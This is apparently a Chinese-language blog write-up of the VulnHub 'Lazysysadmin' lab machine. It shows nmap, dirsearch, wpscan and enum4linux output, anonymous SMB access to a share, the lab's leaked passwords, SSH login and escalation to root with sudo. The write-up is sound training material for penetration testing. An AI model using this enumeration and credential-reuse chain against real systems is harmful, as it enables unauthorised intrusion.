NEKO

vulnhub-Lazysysadmin

2018/07/26

主机扫描

1
nmap -sP 10.10.10.0/24

发现靶机ip:10.10.10.188

服务扫描

1
2
3
4
5
6
7
8
nmap -sS -Pn -T4 10.10.10.188

22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6667/tcp open irc

445端口有smb服务,6667开启了irc服务,139开启了NBT服务.

扫目录

从80入手

1
python3 dirsearch.py -u 10.10.10.188 -e *

字典需调教下.

发现phpmyadmin和wordpress
其余的目录没发现有用信息.

对wordpress信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
root@neko:~# wpscan http://10.10.10.188/wordpress
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://10.10.10.188/wordpress/
[+] Started: Fri Jul 27 11:41:54 2018

[!] The WordPress 'http://10.10.10.188/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://10.10.10.188/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://10.10.10.188/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://10.10.10.188/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.10.10.188/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.10.10.188/wordpress/wp-includes/

[+] WordPress version 4.8.7 (Released on 2018-07-05) identified from links opml, meta generator

[+] WordPress theme in use: twentyfifteen - v1.8

[+] Name: twentyfifteen - v1.8
| Last updated: 2018-05-17T00:00:00.000Z
| Location: http://10.10.10.188/wordpress/wp-content/themes/twentyfifteen/
| Readme: http://10.10.10.188/wordpress/wp-content/themes/twentyfifteen/readme.txt
[!] The version is out of date, the latest version is 2.0
| Style URL: http://10.10.10.188/wordpress/wp-content/themes/twentyfifteen/style.css
| Theme Name: Twenty Fifteen
| Theme URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
| Author: the WordPress team
| Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Fri Jul 27 11:41:58 2018
[+] Requests Done: 356
[+] Memory used: 40.523 MB
[+] Elapsed time: 00:00:04

并在站点主页找到站主名字:togie

对smb服务进行探索

enum4linux:Windows平台上曾经出现过一个第三方的信息枚举工具 enum.exe,其利用SMB协议枚举Windows系统和SAMBA服务,以此来获得目标系统大量的重要信息,其枚举结果可能包含目标系统的用户帐号、组帐号、共享目录、密码策略等机密重要信息。enum4linux作为其Linux平台的复刻作品,全面兼容了enum.exe的所有功能。对于安全防护不足的SMB/SAMBA服务,enum4linux可直接枚举重要信息,甚至帮助我们发现潜在漏洞的存在。为充分利用其功能,使用者需要对NetBIOS和SMB协议有所了解。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
root@neko:~# enum4linux 10.10.10.188
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul 27 11:47:13 2018

==========================
| Target Information |
==========================
Target ........... 10.10.10.188
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


====================================================
| Enumerating Workgroup/Domain on 10.10.10.188 |
====================================================
[+] Got domain/workgroup name: WORKGROUP

============================================
| Nbtstat Information for 10.10.10.188 |
============================================
Looking up status of 10.10.10.188
LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service
LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service
LAZYSYSADMIN <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

=====================================
| Session Check on 10.10.10.188 |
=====================================
[+] Server 10.10.10.188 allows sessions using username '', password ''

===========================================
| Getting domain SID for 10.10.10.188 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

======================================
| OS information on 10.10.10.188 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.188 from smbclient:
[+] Got OS info for 10.10.10.188 from srvinfo:
LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
platform_id : 500
os version : 6.1
server type : 0x809a03

=============================
| Users on 10.10.10.188 |
=============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

=========================================
| Share Enumeration on 10.10.10.188 |
=========================================
WARNING: The "syslog" option is deprecated

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP LAZYSYSADMIN

[+] Attempting to map shares on 10.10.10.188
//10.10.10.188/print$ Mapping: DENIED, Listing: N/A
//10.10.10.188/share$ Mapping: OK, Listing: OK
//10.10.10.188/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

====================================================
| Password Policy Information for 10.10.10.188 |
====================================================


[+] Attaching to 10.10.10.188 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] LAZYSYSADMIN
[+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


==============================
| Groups on 10.10.10.188 |
==============================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

=======================================================================
| Users on 10.10.10.188 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username '', password ''
S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
S-1-5-21-2952042175-1524911573-1237092750-502 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-503 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-504 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-505 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-506 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-507 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-508 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-509 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-510 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-511 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-515 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-516 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-517 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-518 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-519 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-520 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-521 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-522 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-523 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-524 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-525 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-526 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-527 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-528 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-529 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-530 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-531 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-532 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-533 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-534 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-535 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-536 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-537 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-538 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-539 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-540 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-541 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-542 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-543 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-544 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-545 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-546 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-547 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-548 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-549 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-550 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1000 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1001 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1002 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1003 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1004 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1005 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1006 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1007 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1008 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1009 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1010 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1011 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1012 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1013 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1014 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1015 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1016 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1017 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1018 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1019 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1020 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1021 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1022 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1023 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1024 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1025 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1026 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1027 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1028 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1029 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1030 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1031 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1032 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1033 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1034 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1035 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1036 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1037 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1038 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1039 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1040 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1041 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1042 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1043 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1044 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1045 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1046 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1047 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1048 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1049 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)

=============================================
| Getting printer info for 10.10.10.188 |
=============================================
No printers returned.


enum4linux complete on Fri Jul 27 11:47:47 2018

发现

1
2
3
4
5
6
7
8
9
10
11
12
Server 10.10.10.188 allows sessions using username '', password ''
...
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
...
//10.10.10.188/print$ Mapping: DENIED, Listing: N/A
//10.10.10.188/share$ Mapping: OK, Listing: OK
//10.10.10.188/IPC$ [E] Can't understand response:
...

可以看到一个叫share$共享处于监听状态.
可以直接链接SMB服务器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@neko:~# smbclient //10.10.10.188/share$
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 15 19:05:52 2017
.. D 0 Mon Aug 14 20:34:47 2017
wordpress D 0 Fri Jul 27 19:37:31 2018
Backnode_files D 0 Mon Aug 14 20:08:26 2017
wp D 0 Tue Aug 15 18:51:23 2017
deets.txt N 139 Mon Aug 14 20:20:05 2017
robots.txt N 92 Mon Aug 14 20:36:14 2017
todolist.txt N 79 Mon Aug 14 20:39:56 2017
apache D 0 Mon Aug 14 20:35:19 2017
index.html N 36072 Sun Aug 6 13:02:15 2017
info.php N 20 Tue Aug 15 18:55:19 2017
test D 0 Mon Aug 14 20:35:10 2017
old D 0 Mon Aug 14 20:35:13 2017

3029776 blocks of size 1024. 1455000 blocks available

或者在windows映射到盘符k上:

1
2
C:\Users\kuraraneko>net use k: \\10.10.10.188\share$
命令成功完成。

在deets.txt中发现:

1
2
3
4
5
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

在wp-config中发现:

1
2
3
4
5
6
7
8
9
10
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');

getshell

本来想通过phpmyadmin来getshell,但发现各种权限限制,没找到路子.
通过之前的用户名:togie和密码:12345 登录ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
root@neko:~# ssh togie@10.10.10.188
The authenticity of host '10.10.10.188 (10.10.10.188)' can't be established.
ECDSA key fingerprint is SHA256:pHi3EZCmITZrakf7q4RvD2wzkKqmJF0F/SIhYcFzkOI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.188' (ECDSA) to the list of known hosts.
##################################################################################################
# Welcome to Web_TR1 #
# All connections are monitored and recorded #
# Disconnect IMMEDIATELY if you are not an authorized user! #
##################################################################################################

togie@10.10.10.188's password:
Permission denied, please try again.
togie@10.10.10.188's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Fri Jul 27 19:53:22 AEST 2018

System load: 0.24 Memory usage: 8% Processes: 192
Usage of /: 46.2% of 2.89GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:
https://landscape.canonical.com/

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$

通过sudo su获得root权限
最后在/root/proof.txt发现flag.

最后别忘了关闭连接:

1
C:\Users\kuraraneko>net use k: /del

菜猫没关链接就把虚拟机删了,结果到注册表才把盘符图标给弄掉(:з」∠)
参考:http://sec-redclub.com/archives/838/

原文作者: n3k0

发表日期: July 26th 2018, 6:19:46

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. 主机扫描
  2. 2. 服务扫描
  3. 3. 扫目录
  4. 4. 对wordpress信息搜集
  5. 5. 对smb服务进行探索
  6. 6. getshell